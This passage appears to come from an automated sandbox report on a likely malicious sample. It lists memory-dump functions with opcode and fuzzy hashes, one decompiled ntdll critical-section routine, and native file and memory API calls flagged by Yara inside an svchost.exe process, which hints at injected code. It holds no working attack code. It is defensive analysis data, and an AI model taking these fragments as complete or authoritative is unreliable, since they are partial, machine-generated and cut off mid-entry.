                                                                • Opcode Fuzzy Hash: 3eff804325eac3b73d0e7285b738b919b1435493ede1fc0e7fe3de625d8d8a5f
                                                                • Instruction Fuzzy Hash: B59002A12A210042D21461694404706008597E1341F51C023A2544564CC5698C61A165
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9950, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15deac28f7fbbe8e7e6836996c52f9bd20bea0e55097ca01b0d1a7f9452c8048
                                                                • Instruction ID: 4a9ee7cbefcb3f2e9bba5d4918ef50a6022ff3f9aecb8e61d0cd76ebbce2ce27
                                                                • Opcode Fuzzy Hash: 15deac28f7fbbe8e7e6836996c52f9bd20bea0e55097ca01b0d1a7f9452c8048
                                                                • Instruction Fuzzy Hash: 649002A129250403D25065694804607004597D0342F51C022A2454565E8A698C51B175
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9A80, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 125a04536b288a8b1f14190c1efec5267ab3736a44fc19ca19dc63d028e83412
                                                                • Instruction ID: b2a387fea8e300ad3bc9074e4423377650da3defdd478980829c079377c67312
                                                                • Opcode Fuzzy Hash: 125a04536b288a8b1f14190c1efec5267ab3736a44fc19ca19dc63d028e83412
                                                                • Instruction Fuzzy Hash: 8A90026129254442D25062694804B0F414597E1342F91C02AA4546564CC9558855A761
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9A10, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59e988408bf64dc9cd9bdd73168d7d42723a6d32d074cad051b252deac02cfd3
                                                                • Instruction ID: 57be48c45e5f03f5040c9b1fc435210dd2d91b8253d69665b76121e8aa51e3f6
                                                                • Opcode Fuzzy Hash: 59e988408bf64dc9cd9bdd73168d7d42723a6d32d074cad051b252deac02cfd3
                                                                • Instruction Fuzzy Hash: 3290027129250402D21061694808747004597D0342F51C022A5554565E86A5C891B571
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009CA3B0, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48f45bbb58d7e631976606266d3ca2e82a806e567b8455a16dbda332e185ddf1
                                                                • Instruction ID: 33e93bbe73c3acdda390e833567cb81dfcf4f7f87698f3990c7d65bb913ba568
                                                                • Opcode Fuzzy Hash: 48f45bbb58d7e631976606266d3ca2e82a806e567b8455a16dbda332e185ddf1
                                                                • Instruction Fuzzy Hash: CF90027129254002D2507169844460B5045A7E0341F51C422E0815564C86558856E261
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9B00, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7606b90e6847b919bddc0842f550096fd38336e10b9eb47a26dbcc7cb1e41963
                                                                • Instruction ID: e73d66a830216cdfbe74348ea66a44f4a858158405dd5c77544fdef69ab0fd61
                                                                • Opcode Fuzzy Hash: 7606b90e6847b919bddc0842f550096fd38336e10b9eb47a26dbcc7cb1e41963
                                                                • Instruction Fuzzy Hash: 209002612D210802D250716984147070046D7D0741F51C022A0414564D86568965B6F1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C95F0, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c497d6a33c15b60795310e60ac3b00bda2889cd0a787eb3746d6ffdbc09fd4a5
                                                                • Instruction ID: c5d4dfaa516a71470405fe8d974ceeaf1dfe0683cc1778142a3ecf3e7032890c
                                                                • Opcode Fuzzy Hash: c497d6a33c15b60795310e60ac3b00bda2889cd0a787eb3746d6ffdbc09fd4a5
                                                                • Instruction Fuzzy Hash: E490027129210802D21461694804686004597D0341F51C022A6414665E96A58891B171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009CAD30, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60cd48130df242693e3814abac8264d99b936d4efeffeec17ec490031d10e278
                                                                • Instruction ID: 302abbcfa71dfa909eddd0212f04aac54de25e13c6749e6e44eb1033dc8dd822
                                                                • Opcode Fuzzy Hash: 60cd48130df242693e3814abac8264d99b936d4efeffeec17ec490031d10e278
                                                                • Instruction Fuzzy Hash: E9900271A96100129250716948146464046A7E0781F55C022A0904564C89948A55A3E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9520, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 678c2f61b353a5064e1ce7e85e6c85f28c4259983dd3a89e36332dcd7b0b00c1
                                                                • Instruction ID: cef90f111a1ed5e083edb4b736c3dd76553e77a7c40834885fc49d060c96c9e8
                                                                • Opcode Fuzzy Hash: 678c2f61b353a5064e1ce7e85e6c85f28c4259983dd3a89e36332dcd7b0b00c1
                                                                • Instruction Fuzzy Hash: D29002E1292240924610A2698404B0A454597E0341F51C027E1444570CC5658851E175
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9560, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8a7992c84e2e6356656a76ca20301babea8f01030510700c02bdb4fba637c57
                                                                • Instruction ID: b860f75daa154596ca658090ad5f5f88db050caa1b65f8476fc22ffa742dbe38
                                                                • Opcode Fuzzy Hash: e8a7992c84e2e6356656a76ca20301babea8f01030510700c02bdb4fba637c57
                                                                • Instruction Fuzzy Hash: AE9002652B2100020255A569060450B0485A7D6391791C026F18065A0CC6618865A361
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C96D0, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ec4734abb633ba18e38e302c4da71898a657d2a8694beec622dfe163b9a2745
                                                                • Instruction ID: 6448d3bc5afcaf41dcca1313b280e631820ed82653b81c78c23b2b46bc8c9a3e
                                                                • Opcode Fuzzy Hash: 3ec4734abb633ba18e38e302c4da71898a657d2a8694beec622dfe163b9a2745
                                                                • Instruction Fuzzy Hash: 5A90027129210842D21061694404B46004597E0341F51C027A0514664D8655C851B561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9610, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 341afad98e7cc81cea703773979fb0655e374b27ea84cd563363e6c208822b67
                                                                • Instruction ID: f9ccd3484d949449ce171477428b9843c20d93f9d9c2ffe8ba0a660d91119ec6
                                                                • Opcode Fuzzy Hash: 341afad98e7cc81cea703773979fb0655e374b27ea84cd563363e6c208822b67
                                                                • Instruction Fuzzy Hash: 1A90027169610802D26071694414746004597D0341F51C022A0414664D87958A55B6E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9650, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 958c67d823644dcf8df7f32730e7c8add168316259b54592137684ad307bad60
                                                                • Instruction ID: 7e1b077d171bddffd4c26cd795c0ec99e20936270e88a883014b190411d80f78
                                                                • Opcode Fuzzy Hash: 958c67d823644dcf8df7f32730e7c8add168316259b54592137684ad307bad60
                                                                • Instruction Fuzzy Hash: 0690027129614842D25071694404A46005597D0345F51C022A04546A4D96658D55F6A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009CA710, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eda04ea926d0564fc999f0aaf3a4d55ed4486eaed9557a8ba60259278cf50ce7
                                                                • Instruction ID: 82dbc6eb1a0431c3f5a3d80ad54a87b36d5beb4b3b27db6194fb1318f4d32b86
                                                                • Opcode Fuzzy Hash: eda04ea926d0564fc999f0aaf3a4d55ed4486eaed9557a8ba60259278cf50ce7
                                                                • Instruction Fuzzy Hash: FC900271392100529610A6A95804A4A414597F0341F51D026A4404564C85948861A161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9730, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 479eded687254f478b60f83ea119be9fbfc076fdb85353753c496d9a7672798e
                                                                • Instruction ID: ee93c5fa863af4b215c910d761a8bb269ca381eec19e53f79bd871bc9d43e9d1
                                                                • Opcode Fuzzy Hash: 479eded687254f478b60f83ea119be9fbfc076fdb85353753c496d9a7672798e
                                                                • Instruction Fuzzy Hash: 7D90026169610402D25071695418706005597D0341F51D022A0414564DC6998A55B6E1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9770, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e077a02e106f849526c07c316a0deafaf2b16dc4e514f597e896a591007801bd
                                                                • Instruction ID: acc427b2b6a2bfe22c67668593fb3d32beca5ba30bd3828132ce1ad0844734fd
                                                                • Opcode Fuzzy Hash: e077a02e106f849526c07c316a0deafaf2b16dc4e514f597e896a591007801bd
                                                                • Instruction Fuzzy Hash: CE90026129614442D21065695408A06004597D0345F51D022A14545A5DC6758851F171
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009CA770, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 509ea6b7b0c30c6679e4865ffac6ad88a5f863e6a7d17da1e9a787067ebe77bc
                                                                • Instruction ID: 9c21cfac4c30de48314ed6cf4a3ccf4f6f60bff1782ffc9a1061f1441df99461
                                                                • Opcode Fuzzy Hash: 509ea6b7b0c30c6679e4865ffac6ad88a5f863e6a7d17da1e9a787067ebe77bc
                                                                • Instruction Fuzzy Hash: D190027529614442D61065695804A87004597D0345F51D422A08145ACD86948861F161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9760, Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4127e507cad80470078637f3d85c4704de314fa25e7b0f24a4d19b5330203f9d
                                                                • Instruction ID: 9dbfac77569968274c020dac970fbf169e2e4ae1f73b900547b54c94f5a826d5
                                                                • Opcode Fuzzy Hash: 4127e507cad80470078637f3d85c4704de314fa25e7b0f24a4d19b5330203f9d
                                                                • Instruction Fuzzy Hash: 3E90027129210403D21061695508707004597D0341F51D422A0814568DD6968851B161
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 009C9670, Relevance: .0, Instructions: 2COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: f61b35397200a2da080c889cb62f57e31bead47215a18e1c1e9e0988e4686f42
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00A1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E00A1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                0x00a1fdda
                                                                0x00a1fde2
                                                                0x00a1fde5
                                                                0x00a1fdec
                                                                0x00a1fdfa
                                                                0x00a1fdff
                                                                0x00a1fe0a
                                                                0x00a1fe0f
                                                                0x00a1fe17
                                                                0x00a1fe1e
                                                                0x00a1fe19
                                                                0x00a1fe19
                                                                0x00a1fe19
                                                                0x00a1fe20
                                                                0x00a1fe21
                                                                0x00a1fe22
                                                                0x00a1fe25
                                                                0x00a1fe40

                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A1FDFA
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A1FE2B
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A1FE01
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.300105203.0000000000960000.00000040.00000001.sdmp, Offset: 00960000, based on PE: true
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: b30bea65ce5ba83d82c85569f547a68770357078d43fa6470f2c9f6c4145cf07
                                                                • Instruction ID: ea97ac5f48c1c0b1c8d9270ec6f0f2890b6cd0a3101b6f38b8193ed9ace42085
                                                                • Opcode Fuzzy Hash: b30bea65ce5ba83d82c85569f547a68770357078d43fa6470f2c9f6c4145cf07
                                                                • Instruction Fuzzy Hash: 44F0CD72600641BFEA211A55DC02F63BF6AEB85730F244214F628565E2EA62A8A096A0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Analysis Process: svchost.exe PID: 2600 Parent PID: 3472 svchost.exeCOMMON

                                                                Executed Functions

                                                                Function 02DA85CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02DA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DA861D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: .z`
                                                                • API String ID: 823142352-1441809116
                                                                • Opcode ID: fecf136d83a0db372da9681b8b88375e329951e4e994cd0b99f955a6c9a3953c
                                                                • Instruction ID: b6f8e30e227eafea1e7a3c55f84315ebc8cefa2afc5d839b9a9bfa5ac8fc55cb
                                                                • Opcode Fuzzy Hash: fecf136d83a0db372da9681b8b88375e329951e4e994cd0b99f955a6c9a3953c
                                                                • Instruction Fuzzy Hash: AC01B6B2210208ABCB08CF89DC94EEB77EDAF8C754F158248BA0D97240D630E811CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA85D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02DA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DA861D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: .z`
                                                                • API String ID: 823142352-1441809116
                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                • Instruction ID: 09afcf950ea8d7caaf0962a93477b22a184e03fd268bce3cea7deb5fcbedac06
                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                • Instruction Fuzzy Hash: 5EF0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA867A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(02DA3D62,5E972F65,FFFFFFFF,02DA3A21,?,?,02DA3D62,?,02DA3A21,FFFFFFFF,5E972F65,02DA3D62,?,00000000), ref: 02DA86C5
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: ff9277eb3cfee77125c982f8892ed0cd62fdb07e24e09e862de341b393803762
                                                                • Instruction ID: 3bfca0e05892e2090152d8c3e35d37798330c94a8ec305cec47d87adb586a119
                                                                • Opcode Fuzzy Hash: ff9277eb3cfee77125c982f8892ed0cd62fdb07e24e09e862de341b393803762
                                                                • Instruction Fuzzy Hash: ACF0F9B2200108ABCB14CF88CC94EEB77A9EF8C714F118248BA4D97241CA30E815CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA8680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(02DA3D62,5E972F65,FFFFFFFF,02DA3A21,?,?,02DA3D62,?,02DA3A21,FFFFFFFF,5E972F65,02DA3D62,?,00000000), ref: 02DA86C5
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                • Instruction ID: 79e384e8692d6b3560d4c64da8a619b49ed71c0239603af2ef7b1a83bb638146
                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                • Instruction Fuzzy Hash: 87F0A4B2200208ABCB18DF89DC94EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA87B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D92D11,00002000,00003000,00000004), ref: 02DA87E9
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                • Instruction ID: 51ca1bb08195e365bf6a199597cd0ce1612f47dbdbb405581576cc6c465f4d1b
                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                • Instruction Fuzzy Hash: 51F015B2200208ABCB18DF89CC90EEB77ADEF88750F118148BE0897241C630F810CBB0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA86FB, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(02DA3D40,?,?,02DA3D40,00000000,FFFFFFFF), ref: 02DA8725
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 8fd6f80c12963220751c14da44c8e5d165cfd8cc80cca81c1e192e504e8f0a96
                                                                • Instruction ID: dc0c5940710f1b4085236d7da6dd08ca54bfaa062bab8faf28055fd4c7b5cd76
                                                                • Opcode Fuzzy Hash: 8fd6f80c12963220751c14da44c8e5d165cfd8cc80cca81c1e192e504e8f0a96
                                                                • Instruction Fuzzy Hash: 03E0C2726002106BD714DBA4CC84FD77F28EF84320F0545A8F98DAB281C530E510C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02DA8700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(02DA3D40,?,?,02DA3D40,00000000,FFFFFFFF), ref: 02DA8725
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Offset: 02D90000, based on PE: false
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                • Instruction ID: bcde75b3f48f5a4e51872e7a0dcaf9d976a1424d56a8e0542973650b8b6ac9d3
                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                • Instruction Fuzzy Hash: 3FD01776600218ABD714EB98CC89EE77BADEF48760F154499BA189B242C570FA008AE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f638e275fc5d24e26785da15f2ddfd8ffb5dd66a581ae30f027e7c97e92f8d9a
                                                                • Instruction ID: 00016f916d4af7dd43782b7f835d31487de9f10582d7390f3bc407b829ed157f
                                                                • Opcode Fuzzy Hash: f638e275fc5d24e26785da15f2ddfd8ffb5dd66a581ae30f027e7c97e92f8d9a
                                                                • Instruction Fuzzy Hash: 1390026121184442E200A5A94C14B0700069BD0343F51C155A1149665CCA55C8696561
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 038699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 25de70cfbe4325400d8f09693833cd2bd165979576679524236255910c791a01
                                                                • Instruction ID: 1265baec3b3ee9af5b5ef5089e17556824cd9ff93a8b3b31dbdc8dce6bbf8d6c
                                                                • Opcode Fuzzy Hash: 25de70cfbe4325400d8f09693833cd2bd165979576679524236255910c791a01
                                                                • Instruction Fuzzy Hash: 7A9002A134104842E100A1994414B060006DBE1341F51C055E2059665D8759CC5A7166
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1046a3cc699b9cb5ad0ea367a5d0c00daaae6531ef559fb809f8279c567c8ad5
                                                                • Instruction ID: ab754813e6e0335e72d3dd5ef239fa0695cebbd55d6c3218ad2a6e0cc4601c3d
                                                                • Opcode Fuzzy Hash: 1046a3cc699b9cb5ad0ea367a5d0c00daaae6531ef559fb809f8279c567c8ad5
                                                                • Instruction Fuzzy Hash: FB9002B120104802E140B199440474600069BD0341F51C051A6059665E8799CDDD76A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03869840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.503045545.0000000003800000.00000040.00000001.sdmp, Offset: 03800000, based on PE: true
                                                                • Associated: 0000000E.00000002.503804799.000000000391B000.00000040.00000001.sdmp Download File
                                                                • Associated: 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp Download File
                                                                Similarity
                                                                • API ID: InitializeThunk
